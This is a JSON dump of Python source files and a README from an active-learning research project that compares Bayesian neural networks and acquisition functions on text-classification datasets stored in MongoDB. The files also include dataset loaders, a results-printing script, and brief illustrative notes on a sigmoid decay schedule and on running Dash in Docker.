Optional[Callable[[int], float]] = None,\n active_learning_step: int = 1,\n number_of_classes_for_nn: int = 2,\n ):\n self.feed_forward_nn = GeneralizedPeonyBoxModel(\n model=PeonyFeedForwardNN(\n hidden_size=100,\n num_classes=number_of_classes_for_nn,\n rand_sample_ratio=1, # RAND_SAMPLES_RATIO,\n num_ensembles=1,\n ),\n transformator=transformator,\n active_learning_step=active_learning_step,\n acquisition_function=acquisition_function,\n greedy_coef_decay=greedy_coef_decay,\n ascquisition_func_ratio=ACQUISITION_FUNC_RATIO,\n )\n self.bayesian_sgld_nn = GeneralizedPeonyBoxModel(\n model=PeonySGLDFeedForwardNN(hidden_size=100, num_classes=number_of_classes_for_nn),\n transformator=transformator,\n active_learning_step=active_learning_step,\n acquisition_function=acquisition_function,\n greedy_coef_decay=greedy_coef_decay,\n ascquisition_func_ratio=ACQUISITION_FUNC_RATIO,\n )\n self.bayesian_denfi_nn = GeneralizedPeonyBoxModel(\n model=PeonyDENFIFeedForwardNN(\n hidden_size=100,\n num_classes=number_of_classes_for_nn,\n rand_sample_ratio=1,\n cold_start=False,\n ),\n transformator=transformator,\n active_learning_step=active_learning_step,\n acquisition_function=acquisition_function,\n greedy_coef_decay=greedy_coef_decay,\n reset_after_adding_new_samples=False,\n ascquisition_func_ratio=ACQUISITION_FUNC_RATIO,\n )\n self.bayesian_dropout_nn = GeneralizedPeonyBoxModel(\n model=PeonyDropoutFeedForwardNN(\n hidden_size=100, num_classes=number_of_classes_for_nn, dropout_in_eval = True\n ), # 120 for LSTM\n transformator=transformator,\n active_learning_step=active_learning_step,\n acquisition_function=acquisition_function,\n greedy_coef_decay=greedy_coef_decay,\n reset_after_adding_new_samples=False,\n ascquisition_func_ratio=ACQUISITION_FUNC_RATIO,\n )\n self.dropout_nn = GeneralizedPeonyBoxModel(\n model=PeonyDropoutFeedForwardNN(\n hidden_size=100, num_classes=number_of_classes_for_nn, cold_start=True, dropout_in_eval=False\n ), # 120 for LSTM\n transformator=transformator,\n active_learning_step=active_learning_step,\n acquisition_function=acquisition_function,\n greedy_coef_decay=greedy_coef_decay,\n reset_after_adding_new_samples=False,\n ascquisition_func_ratio=ACQUISITION_FUNC_RATIO,\n )\n"
},
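
Every wrapped model above accepts a `greedy_coef_decay` schedule, defaulting to a sigmoid decay imported from `greedy_coef_decay_functions` in the generalized model. That module is not shown in this section; a generic sigmoid decay over active-learning iterations has roughly this shape (illustrative constants, not the project's actual implementation):

```python
import math

def sigmoid_decay(iteration: int, midpoint: int = 10, steepness: float = 0.5) -> float:
    # close to 1 early (favor random exploration), decaying toward 0
    return 1.0 - 1.0 / (1.0 + math.exp(-steepness * (iteration - midpoint)))

print([round(sigmoid_decay(i), 2) for i in range(0, 21, 5)])  # [0.99, 0.92, 0.5, 0.08, 0.01]
```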
{
"alpha_fraction": 0.571535050868988,
"alphanum_fraction": 0.5737704634666443,
"avg_line_length": 33.410255432128906,
"blob_id": "ce152d8f8009fe48a23f18282ec8ed919a4993e4",
"content_id": "c7c897f58a12a1c1515b2e7a2039e8c9ea381659",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1342,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 39,
"path": "/Peony_project/Peony_database/src/datasets/Newsgroups_dataset.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import json\nimport logging\n\nfrom pathlib import Path\nfrom typing import Dict, List, Any\nfrom Peony_database.src.datasets.common import create_hash\nfrom tqdm import tqdm\n\n\nCOLLECTION_NAME = \"4_newsgroups_dataset\"\n\n\ndef transorm_data(record: Dict[str, Any]) -> Dict[str, Any]:\n transormed_record: dict = {}\n transormed_record[\"datasetName\"] = COLLECTION_NAME\n transormed_record[\"datasetId\"] = 2\n transormed_record[\"record\"] = {}\n transormed_record[\"record\"][\"text\"] = {\"body\": record[\"text\"]}\n transormed_record[\"record\"][\"label\"] = record[\"label\"]\n transormed_record[\"record\"][\"metadata\"] = {\"language\": \"en\"}\n transormed_record[\"record\"][\"id\"] = create_hash([record[\"text\"]])\n return transormed_record\n\n\ndef load_data(path: Path) -> List[dict]:\n data: list = []\n for folder in tqdm(path.iterdir()):\n if folder.stem != \".DS_Store\":\n for record in folder.iterdir():\n try:\n with open(record, \"r\", encoding=\"utf-8\") as f:\n data.append(\n {\"text\": f.read(), \"label\": f\"{folder.stem}{folder.suffix}\"}\n )\n except:\n logging.warning(\n \"Some fields are missing. This record was removed from dataset\"\n )\n return data\n"
},
{
"alpha_fraction": 0.6196439266204834,
"alphanum_fraction": 0.6360957622528076,
"avg_line_length": 26.893835067749023,
"blob_id": "e7a5148bcebaa2fed58f1fdec2391a91540102b3",
"content_id": "5b6fd54d10edce56cd07a4428cae99ce30d36d02",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8145,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 292,
"path": "/Peony_project/Peony_box/active_learning_simulation/active_learning_simulation.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "from telnetlib import IP\nfrom PeonyPackage.PeonyDb import MongoDb\nfrom Peony_box.active_learning_simulation.utils import active_learning_simulation\n\nfrom Peony_box.src.transformators.HuffPost_transformator import (\n RoBERTaWordEmbeddings as transformator,\n)\n\n# from Peony_database.src.datasets.Tweets_emotions_dataset import COLLECTION_NAME, COLLECTION_ID\nfrom Peony_database.src.datasets.fake_news_detection import COLLECTION_NAME, COLLECTION_ID\n# from Peony_database.src.datasets.gibberish import COLLECTION_NAME, COLLECTION_ID\n# from Peony_database.src.datasets.amazon_reviews import COLLECTION_NAME, COLLECTION_ID\n\nfrom Peony_box.src.acquisition_functions.functions import (\n entropy_sampling,\n batch_bald,\n hac_entropy_sampling,\n hac_bald_sampling,\n power_bald,\n bald_sampling,\n)\nfrom Peony_visualization.src.peony_visualization import visualize_two_auc_evolutions\n\nfrom sklearn.utils import shuffle\nimport numpy as np\n\n\nASC_FUNC_MAP = {\n \"random\": None,\n \"batch_bald\": batch_bald,\n \"power_bald\": power_bald,\n \"entropy_sampling\": entropy_sampling,\n \"bald_sampling\": bald_sampling,\n \"hac_entropy_sampling\": hac_entropy_sampling,\n \"hac_bald_sampling\": hac_bald_sampling,\n}\n\nALGORITHM_1 = \"bayesian_dropout\"\nALGORITHM_2 = \"nn\"\n\nENCODER = \"\"\nNOISE = \"\"\n\nASC_FUNC_1 = \"hac_entropy_sampling\"\nASC_FUNC_2 = \"hac_bald_sampling\"\nASC_FUNC_3 = \"random\"\nASC_FUNC_4 = \"entropy_sampling\"\nASC_FUNC_5 = \"bald_sampling\"\n\nLABELS = [0,1]#[0, 1]#[0,4] #[3, 5]\n\nLIMIT_1 = 2000\nLIMIT_2 = 2000\n\nACTIVE_LEARNING_LOOPS = 5\nACTIVE_LEARNING_STEP = 50\nACTIVE_LEARNING_SAMPLES = 20\nINITIAL_TRAINING_DATA_SIZE = 10\n\nMODEL_1 = f\"{ALGORITHM_1}_{ENCODER}_{NOISE}_{ASC_FUNC_1}_{ACTIVE_LEARNING_STEP}_{ACTIVE_LEARNING_SAMPLES}\"\nMODEL_2 = f\"{ALGORITHM_2}_{ENCODER}_{NOISE}_{ASC_FUNC_2}_{ACTIVE_LEARNING_STEP}_{ACTIVE_LEARNING_SAMPLES}\"\n\nCATEGORY_1 = \"Fake_news_detection_0\" #\"Tweet_emotion_0\" #\"GIBBERISH 1\"\nCATEGORY_2 = \"Fake_news_detection_1\" #\"Tweet_emotion_4\" #\"GIBBERISH 2\"\n\n\ndef main():\n\n api = MongoDb()\n\n records_1 = api.get_record(\n collection_name=COLLECTION_NAME,\n collection_id=COLLECTION_ID,\n label=LABELS[0],\n limit=LIMIT_1,\n )\n records_2 = api.get_record(\n collection_name=COLLECTION_NAME,\n collection_id=COLLECTION_ID,\n label=LABELS[1],\n limit=LIMIT_2,\n )\n\n # Define model specifications\n transformation_needed = False\n\n instances = records_1 + records_2\n labels = [sample[\"record\"][\"label\"] for sample in records_1 + records_2]\n\n instances_from_db, labels_from_db = shuffle(instances, labels, random_state=0)\n\n # HuffPostTransform = word_embed_transformator()\n\n HuffPostTransform = (\n transformator()\n ) # I'm using here not HuffPost transformator but I'm too lazy to change all variable names\n\n HuffPostTransform.fit(labels_from_db)\n\n if transformation_needed:\n instances = instances_from_db\n labels = labels_from_db\n else:\n instances = HuffPostTransform.transform_instances(instances_from_db)\n labels = HuffPostTransform.transform_labels(labels_from_db)\n\n # Get AUC results from an active learning simulation\n\n auc_learning_0 = active_learning_simulation(\n HuffPostTransform,\n ASC_FUNC_MAP[ASC_FUNC_1],\n ACTIVE_LEARNING_LOOPS,\n ACTIVE_LEARNING_SAMPLES,\n ACTIVE_LEARNING_STEP,\n ALGORITHM_2,\n instances,\n labels,\n INITIAL_TRAINING_DATA_SIZE,\n transformation_needed,\n )\n\n list_to_upload = [\n ALGORITHM_2,\n ASC_FUNC_1,\n ACTIVE_LEARNING_LOOPS,\n ACTIVE_LEARNING_STEP,\n 
ACTIVE_LEARNING_SAMPLES,\n INITIAL_TRAINING_DATA_SIZE,\n LIMIT_1 + LIMIT_2 - INITIAL_TRAINING_DATA_SIZE - ACTIVE_LEARNING_SAMPLES * ACTIVE_LEARNING_STEP,\n CATEGORY_1,\n CATEGORY_2,\n auc_learning_0,\n ]\n\n api.load_model_results(*list_to_upload)\n\n print(\"Zeros simulation is ready...\")\n \n auc_learning_1 = active_learning_simulation(\n HuffPostTransform,\n ASC_FUNC_MAP[ASC_FUNC_1],\n ACTIVE_LEARNING_LOOPS,\n ACTIVE_LEARNING_SAMPLES,\n ACTIVE_LEARNING_STEP,\n ALGORITHM_1,\n instances,\n labels,\n INITIAL_TRAINING_DATA_SIZE,\n transformation_needed,\n )\n\n list_to_upload = [\n f\"{ALGORITHM_1}_d_0_2\",#_1_ens\",\n ASC_FUNC_1,\n ACTIVE_LEARNING_LOOPS,\n ACTIVE_LEARNING_STEP,\n ACTIVE_LEARNING_SAMPLES,\n INITIAL_TRAINING_DATA_SIZE,\n LIMIT_1 + LIMIT_2 - INITIAL_TRAINING_DATA_SIZE - ACTIVE_LEARNING_SAMPLES * ACTIVE_LEARNING_STEP,\n CATEGORY_1,\n CATEGORY_2,\n auc_learning_1,\n ]\n\n api.load_model_results(*list_to_upload)\n\n print(\"First simulation is ready...\")\n\n auc_learning_2 = active_learning_simulation(\n HuffPostTransform,\n ASC_FUNC_MAP[ASC_FUNC_2],\n ACTIVE_LEARNING_LOOPS,\n ACTIVE_LEARNING_SAMPLES,\n ACTIVE_LEARNING_STEP,\n ALGORITHM_1,\n instances,\n labels,\n INITIAL_TRAINING_DATA_SIZE,\n transformation_needed,\n )\n\n list_to_upload = [\n f\"{ALGORITHM_1}_d_0_2\",#_1_ens\",\n ASC_FUNC_2,\n ACTIVE_LEARNING_LOOPS,\n ACTIVE_LEARNING_STEP,\n ACTIVE_LEARNING_SAMPLES,\n INITIAL_TRAINING_DATA_SIZE,\n LIMIT_1 + LIMIT_2 - INITIAL_TRAINING_DATA_SIZE - ACTIVE_LEARNING_SAMPLES * ACTIVE_LEARNING_STEP,\n CATEGORY_1,\n CATEGORY_2,\n auc_learning_2,\n ]\n\n api.load_model_results(*list_to_upload)\n\n print(\"Second simulation is ready...\")\n\n auc_learning_3 = active_learning_simulation(\n HuffPostTransform,\n ASC_FUNC_MAP[ASC_FUNC_3],\n ACTIVE_LEARNING_LOOPS,\n ACTIVE_LEARNING_SAMPLES,\n ACTIVE_LEARNING_STEP,\n ALGORITHM_1,\n instances,\n labels,\n INITIAL_TRAINING_DATA_SIZE,\n transformation_needed,\n )\n\n list_to_upload = [\n f\"{ALGORITHM_1}_d_0_2\",#_1_ens\",\n ASC_FUNC_3,\n ACTIVE_LEARNING_LOOPS,\n ACTIVE_LEARNING_STEP,\n ACTIVE_LEARNING_SAMPLES,\n INITIAL_TRAINING_DATA_SIZE,\n LIMIT_1 + LIMIT_2 - INITIAL_TRAINING_DATA_SIZE - ACTIVE_LEARNING_SAMPLES * ACTIVE_LEARNING_STEP,\n CATEGORY_1,\n CATEGORY_2,\n auc_learning_3,\n ]\n\n api.load_model_results(*list_to_upload)\n\n print(\"Third simulation is ready...\")\n\n auc_learning_4 = active_learning_simulation(\n HuffPostTransform,\n ASC_FUNC_MAP[ASC_FUNC_4],\n ACTIVE_LEARNING_LOOPS,\n ACTIVE_LEARNING_SAMPLES,\n ACTIVE_LEARNING_STEP,\n ALGORITHM_1,\n instances,\n labels,\n INITIAL_TRAINING_DATA_SIZE,\n transformation_needed,\n )\n\n list_to_upload = [\n f\"{ALGORITHM_1}_d_0_2\",#_1_ens\",\n ASC_FUNC_4,\n ACTIVE_LEARNING_LOOPS,\n ACTIVE_LEARNING_STEP,\n ACTIVE_LEARNING_SAMPLES,\n INITIAL_TRAINING_DATA_SIZE,\n LIMIT_1 + LIMIT_2 - INITIAL_TRAINING_DATA_SIZE - ACTIVE_LEARNING_SAMPLES * ACTIVE_LEARNING_STEP,\n CATEGORY_1,\n CATEGORY_2,\n auc_learning_4,\n ]\n\n api.load_model_results(*list_to_upload)\n\n print(\"Fourth simulation is ready...\")\n\n auc_learning_5 = active_learning_simulation(\n HuffPostTransform,\n ASC_FUNC_MAP[ASC_FUNC_4],\n ACTIVE_LEARNING_LOOPS,\n ACTIVE_LEARNING_SAMPLES,\n ACTIVE_LEARNING_STEP,\n ALGORITHM_1,\n instances,\n labels,\n INITIAL_TRAINING_DATA_SIZE,\n transformation_needed,\n )\n\n list_to_upload = [\n f\"{ALGORITHM_1}_d_0_2\",#_1_ens\",\n ASC_FUNC_5,\n ACTIVE_LEARNING_LOOPS,\n ACTIVE_LEARNING_STEP,\n ACTIVE_LEARNING_SAMPLES,\n INITIAL_TRAINING_DATA_SIZE,\n LIMIT_1 + LIMIT_2 - INITIAL_TRAINING_DATA_SIZE - 
ACTIVE_LEARNING_SAMPLES * ACTIVE_LEARNING_STEP,\n CATEGORY_1,\n CATEGORY_2,\n auc_learning_5,\n ]\n\n api.load_model_results(*list_to_upload)\n\n print(\"Fifth simulation is ready...\")\n\n #visualize_two_auc_evolutions(auc_learning_1, auc_learning_2)\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.8003876209259033,
"alphanum_fraction": 0.8003876209259033,
"avg_line_length": 38.769229888916016,
"blob_id": "d6f20221b918c8d327c31c566eeea2538ad236f9",
"content_id": "12d1e360d1b96e0d1ed369f10fe717fa21def624",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 516,
"license_type": "no_license",
"max_line_length": 210,
"num_lines": 13,
"path": "/Peony_project/Peony_visualization/README.MD",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "# Peony Visualization Component\n\n## Visualization Component Description \n\n\n\nVisualization component is implemented with the usage of Dash by Plotly. This is a powerful visualization Python package that can be easily used for creating highly effective web pages with nice web interface. \n\n[Dash documentation can found here](https://plot.ly/dash/)\n\n## Docker + Dash\n\n//TODO Write documentation for this section"
},
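
Until the Docker section above is written, one generic detail is worth noting: inside a container the Dash server must bind to all interfaces, since the default `127.0.0.1` is unreachable through Docker's port mapping (illustrative snippet only; port 8050 is Dash's default, not project configuration):

```python
import dash
import dash_html_components as html

app = dash.Dash(__name__)
app.layout = html.Div("Peony visualization placeholder")

if __name__ == "__main__":
    # 0.0.0.0 exposes the dev server through the container's mapped port
    app.run_server(host="0.0.0.0", port=8050)
```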
{
"alpha_fraction": 0.6138743162155151,
"alphanum_fraction": 0.6138743162155151,
"avg_line_length": 22.15151596069336,
"blob_id": "f09066ca1c1f182e3aea7e6906ac9b9058b3f0d4",
"content_id": "b46d3ab1d1438ad3eb444f2cf56b2115cf1e62a2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 764,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 33,
"path": "/Peony_project/Peony_box/src/transformators/generalized_transformator.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import torch\n\nfrom typing import Callable, List, Dict\n\n\nclass Transformator:\n def __init__(\n self,\n embedding_dim: int,\n ):\n self.embedding_dim = embedding_dim\n\n self.encoding_mapper: Dict[str, int] = {}\n self.reverse_mapper: Dict[int, str] = {}\n\n def fit(self):\n pass\n\n def transform_instances(self):\n pass\n\n def transform_labels(self):\n transformed_data = [self.transform_label(sample) for sample in tqdm(data)]\n return np.asarray(transformed_data).ravel()\n\n def reset(self):\n pass\n\n def transform_label(self, sample: str) -> int:\n return self.encoding_mapper[sample]\n\n def transform_to_label(self, value: int) -> str:\n return self.reverse_mapper[value]\n"
},
{
"alpha_fraction": 0.6727272868156433,
"alphanum_fraction": 0.6818181872367859,
"avg_line_length": 23.44444465637207,
"blob_id": "050c6baf6a29a0f24a66676f0cab7f90772aa6dd",
"content_id": "033e20133746384a656e020e91bef6595de86f35",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 220,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 9,
"path": "/Peony_project/setup.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "from distutils.core import setup\n\nsetup(\n name=\"PeonyPackage\",\n version=\"1.0\",\n description=\"Pakcage for Peony Project usage\",\n packages=[\"PeonyPackage\"],\n package_dir={\"PeonyPackage\": \"PeonyPackage/\"},\n)\n"
},
{
"alpha_fraction": 0.5989916324615479,
"alphanum_fraction": 0.602065920829773,
"avg_line_length": 34.35652160644531,
"blob_id": "1ead18092c0e51e627b271c5a41f0a9ea5d5fd15",
"content_id": "a1fea57a41a53c7bf8251d324d418b06cb038535",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8132,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 230,
"path": "/Peony_project/Peony_box/src/peony_adjusted_models/generalized_peony_box_model.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "from telnetlib import IP\nimport pymongo\nimport numpy as np\nimport torch\n\nfrom scipy.sparse import csc_matrix\nfrom scipy.sparse import vstack\nfrom sklearn.preprocessing import OneHotEncoder\n\nfrom torch.utils.data import DataLoader, Dataset\nfrom torch.nn.utils.rnn import pad_sequence\n\nfrom typing import Callable, Any, List, Dict, Optional, Union, Tuple\n\nfrom Peony_box.src.peony_adjusted_models.random_trees_model import PeonyRandomForest\nfrom Peony_box.src.transformators.generalized_transformator import Transformator\nfrom Peony_box.src.acquisition_functions.functions import random_sampling\nfrom Peony_box.src.greedy_coef_decay_functions.functions import sigmoid_decay\n\n\nBATCH_SIZE = 32\n\n\ndef easy_colate(inputs) -> Tuple[torch.Tensor, torch.Tensor]:\n\n embeddings, labels = zip(*inputs)\n\n return (\n torch.stack([torch.mean(torch.stack(row, dim=0), dim=0) for row in embeddings], dim=0),\n torch.tensor(labels, dtype=torch.int64),\n )\n\n\ndef lstm_colate(inputs) -> List[Any]:\n\n embeddings, target = zip(*inputs)\n zipped = zip(\n [torch.stack(sentence, dim=0) for sentence in embeddings],\n target,\n list(range(len(embeddings))),\n [len(sentence) for sentence in embeddings],\n )\n\n embeddings, labels, indices, seq_lengths = zip(*sorted(zipped, key=lambda x: x[-1], reverse=True))\n\n indices = sorted(range(len(indices)), key=lambda k: indices[k])\n\n return [\n (\n pad_sequence(embeddings, batch_first=True),\n torch.tensor(seq_lengths, dtype=torch.long),\n torch.tensor(indices, dtype=torch.long),\n ),\n torch.tensor(labels, dtype=torch.int64),\n ]\n\n\nclass PeonyDataset(Dataset):\n def __init__(self, instances, labels):\n \"Initialization\"\n\n self.instances, self.labels = instances, labels\n self.features_size = self.instances[0][0].size()[0] if self.instances else 0\n\n def __len__(self):\n \"Denotes the total number of samples\"\n return len(self.instances)\n\n def __getitem__(self, index):\n \"Generates one sample of data\"\n\n return self.instances[index], self.labels[index]\n\n\nclass GeneralizedPeonyBoxModel:\n def __init__( # type: ignore\n self,\n model: Any,\n transformator: Transformator,\n active_learning_step: int,\n acquisition_function: Optional[Callable[[np.ndarray, int, np.ndarray], np.ndarray]],\n greedy_coef_decay: Optional[Callable[[int], float]],\n reset_after_adding_new_samples: bool = True,\n ascquisition_func_ratio: float = 1,\n collate: Callable[[List[Any]], Any] = easy_colate,\n ):\n self.model = model\n self.transformator = transformator\n self.active_learning_step = active_learning_step\n self.training_dataset: Dict[str, np.ndarray] = {}\n self.acquisition_function = acquisition_function\n self.epsilon_greedy_coef = 0.0\n self.active_learning_iteration = 0\n self.reset_after_adding_new_samples = reset_after_adding_new_samples\n self.ascquisition_func_ratio = 1 if active_learning_step == 1 else ascquisition_func_ratio\n self.collate = collate\n if greedy_coef_decay:\n self.greedy_coef_decay = greedy_coef_decay\n else:\n self.greedy_coef_decay = sigmoid_decay\n\n def fit(\n self,\n instances: Union[List[Dict[str, Any]], List[List[torch.Tensor]]],\n labels: Union[List[Any], List[int]],\n transformation_needed: bool = True,\n ) -> Optional[List[Any]]:\n\n fit_output: List[Any] = []\n\n if transformation_needed:\n print(\"transforming instances for model training...\")\n instances = self.transformator.transform_instances(instances)\n print(\"transforming labels for model training...\")\n labels = 
self.transformator.transform_labels(labels)\n\n if self.training_dataset == {}:\n self.training_dataset[\"training_instances\"] = instances\n self.training_dataset[\"training_labels\"] = labels\n else:\n self.training_dataset[\"training_instances\"] = (\n self.training_dataset[\"training_instances\"] + instances\n )\n self.training_dataset[\"training_labels\"] = self.training_dataset[\"training_labels\"] + labels\n\n training_dataloader = PeonyDataset(\n self.training_dataset[\"training_instances\"],\n self.training_dataset[\"training_labels\"],\n )\n\n fit_output.append(\n self.model.fit(\n DataLoader(\n training_dataloader,\n batch_size=BATCH_SIZE,\n shuffle=True,\n collate_fn=self.collate,\n ),\n training_dataloader.features_size,\n )\n )\n\n if None not in fit_output:\n return fit_output\n else:\n return None\n\n def predict(\n self,\n instances: Union[List[Dict[str, Any]], List[List[torch.Tensor]]],\n transformation_needed: bool = True,\n ) -> List[Any]:\n if transformation_needed:\n print(\"transforming instances for model prediction...\")\n instances = self.transformator.transform_instances(instances)\n\n pred_dataset = PeonyDataset(\n instances,\n torch.zeros((len(instances))),\n )\n\n predicted = self.model.predict(\n DataLoader(\n pred_dataset,\n batch_size=BATCH_SIZE,\n shuffle=False,\n collate_fn=self.collate,\n )\n )\n\n return np.mean([np.argmax(pred, axis=1) for pred in predicted], axis=0)\n\n def reset(self) -> None:\n self.model.reset()\n\n def get_learning_samples(\n self,\n instances: Union[List[Dict[str, Any]], List[torch.Tensor]],\n transformation_needed: bool = True,\n ) -> np.ndarray:\n if transformation_needed:\n print(\"transforming instances for model getting learning sample...\")\n instances = self.transformator.transform_instances(instances)\n\n pred_dataset = PeonyDataset(\n instances,\n torch.zeros((len(instances))),\n )\n predicted = self.model.predict(\n DataLoader(\n pred_dataset,\n batch_size=BATCH_SIZE,\n shuffle=False,\n collate_fn=self.collate,\n )\n )\n if self.acquisition_function is not None:\n if np.random.uniform(0, 1) > self.epsilon_greedy_coef:\n self.epsilon_greedy_coef = self.greedy_coef_decay(self.active_learning_iteration)\n self.active_learning_iteration += self.active_learning_step\n return random_sampling(predicted, self.active_learning_step)\n else:\n self.epsilon_greedy_coef = self.greedy_coef_decay(self.active_learning_iteration)\n self.active_learning_iteration += self.active_learning_step\n active_learning_samples = int(round(self.active_learning_step * self.ascquisition_func_ratio))\n return np.concatenate(\n (\n self.acquisition_function(np.asarray(predicted), active_learning_samples, instances),\n random_sampling(\n predicted,\n self.active_learning_step - active_learning_samples,\n ),\n )\n )\n else:\n self.active_learning_iteration += self.active_learning_step\n return random_sampling(predicted, self.active_learning_step)\n\n def add_new_learning_samples(\n self,\n instances: Union[List[Dict[str, Any]], np.ndarray],\n labels: Union[List[Any], np.ndarray],\n transformation_needed: bool = True,\n ) -> None:\n if self.reset_after_adding_new_samples:\n self.reset()\n if transformation_needed:\n self.fit(instances, labels)\n else:\n self.fit(instances, labels, transformation_needed=False)\n"
},
{
"alpha_fraction": 0.6739884614944458,
"alphanum_fraction": 0.6751444935798645,
"avg_line_length": 31.037036895751953,
"blob_id": "2db9bb667bad71ef3f1544afc8954c9e4a73febc",
"content_id": "7fbb2ecefa37aa48ddaa25ed3dfe640c32fcbf7d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 865,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 27,
"path": "/Peony_project/Peony_box/src/transformators/TweetsEmotion_transformator.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "from PeonyPackage.PeonyDb import MongoDb\nfrom Peony_box.src.transformators.HuffPost_transformator import (\n HuffPostTransformWordEmbeddings,\n)\nfrom typing import Dict, Any\n\nCOLEECTION_NAME = \"Tweets_emotions_dataset\"\n\n\nclass TweetsEmotionsTransformWordEmbeddings(HuffPostTransformWordEmbeddings):\n def __init__(self):\n self.transformer = {}\n self.fitted: bool = False\n self.dict_length: int = 0\n self.api = MongoDb()\n self.encoding_mapper: Dict[int, int] = {}\n self.reverse_mapper: Dict[int, str] = {}\n\n @staticmethod\n def _transform_text(sample: Dict[str, Any]) -> str:\n return sample[\"record\"][\"text\"][\"body\"]\n\n def transform_label(self, sample: int) -> int:\n return self.encoding_mapper[sample]\n\n def transform_to_label(self, value: int) -> str:\n return self.reverse_mapper[value]\n"
},
{
"alpha_fraction": 0.5227272510528564,
"alphanum_fraction": 0.5757575631141663,
"avg_line_length": 25.399999618530273,
"blob_id": "6c50e4e385f92c05688401b61bf0ded9e92da1c9",
"content_id": "6d0ae4b32dbd334b232f0d6c30c2f5a769bd8c82",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 132,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 5,
"path": "/Peony_project/Peony_box/src/greedy_coef_decay_functions/functions.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\n\ndef sigmoid_decay(value: int) -> float:\n return np.exp((value - 3) * 0.1) / (np.exp((value - 3) * 0.1) + 1)\n"
},
{
"alpha_fraction": 0.6564729809761047,
"alphanum_fraction": 0.6615698337554932,
"avg_line_length": 31.700000762939453,
"blob_id": "52e837ccadc11b95b975f28668541e2c47c83166",
"content_id": "48356a39549de80ef4edbb59301b1acc464cd28b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 981,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 30,
"path": "/Peony_project/Peony_database/src/pretrained_models/embeddings/fasttext_embeddings.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import io\nimport numpy\n\nfrom pathlib import Path\nfrom typing import Dict, List, Any\nfrom Peony_database.src.datasets.common import create_hash\nfrom tqdm import tqdm\n\nCOLLECTION_NAME = \"Fasttext_pretrained_embeddings\"\n\n\ndef load_data(path: Path) -> List[Dict[str, List[float]]]:\n fin = io.open(path, \"r\", encoding=\"utf-8\", newline=\"\\n\", errors=\"ignore\")\n data = []\n for line in tqdm(fin):\n tokens = line.rstrip().split(\" \")\n data.append({\"key\": tokens[0], \"value\": [float(val) for val in tokens[1:]]})\n return data\n\n\ndef transorm_data(record: Dict[str, Any]) -> Dict[str, Any]:\n transormed_record: dict = {}\n transormed_record[\"datasetName\"] = COLLECTION_NAME\n transormed_record[\"datasetId\"] = 11\n transormed_record[\"record\"] = {}\n transormed_record[\"record\"][\"id\"] = create_hash([record[\"key\"]])\n transormed_record[\"record\"][\"key\"] = record[\"key\"]\n transormed_record[\"record\"][\"value\"] = record[\"value\"]\n\n return transormed_record\n"
},
{
"alpha_fraction": 0.5596546530723572,
"alphanum_fraction": 0.5745682716369629,
"avg_line_length": 29.33333396911621,
"blob_id": "f0431218e8e1125d8484069311880432c3083a2e",
"content_id": "6ceda8817a3920050027afebed7fdb0d783a5a65",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1275,
"license_type": "no_license",
"max_line_length": 179,
"num_lines": 42,
"path": "/Peony_project/print_data.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\nfrom PeonyPackage.PeonyDb import MongoDb\nfrom tabulate import tabulate\n\ndef main():\n api = MongoDb()\n\n results = list(api.database[\"models_results\"].find()) \n\n tabulate_list = []\n header = [\"mongo_id\", \"run_name\"] + list(range(1,11))\n\n batch_size = 0\n\n for result in results:\n \n if batch_size == 0:\n batch_size = int(result[\"learning_step\"])\n if batch_size != int(result[\"learning_step\"]):\n tabulate_list.append([\"\" for i in range(11)])\n batch_size = int(result[\"learning_step\"])\n\n name = f\"{result['model']}_{result['acquisition_function']}_{result['learning_step']}_{result['active_learning_iterations']}_{result['category_1']}_{result['category_2']}\"\n mean = np.mean(result[\"results\"],axis = 0)\n std = np.std(result[\"results\"],axis = 0)\n\n res_id = result[\"_id\"]\n\n results_list = [res_id, name]\n i_sampler = len(mean)//10\n\n for i, (m, s) in enumerate(zip(mean, std)):\n if (i+1) % i_sampler == 0:\n results_list.append(f\"{round(m[0],3)}±{round(s[0],3)}\")\n\n tabulate_list.append(results_list)\n\n print(tabulate(tabulate_list, headers=header, tablefmt='orgtbl'))\n\nif __name__==\"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.6798858046531677,
"alphanum_fraction": 0.6897208094596863,
"avg_line_length": 28.735849380493164,
"blob_id": "df03a7f9cfbffbbd032d7bd6e06319044e4fb2e2",
"content_id": "bf9c61c605137e2ee54079276b9edfbed3c343c2",
"detected_licenses": [],
"is_generated": false,
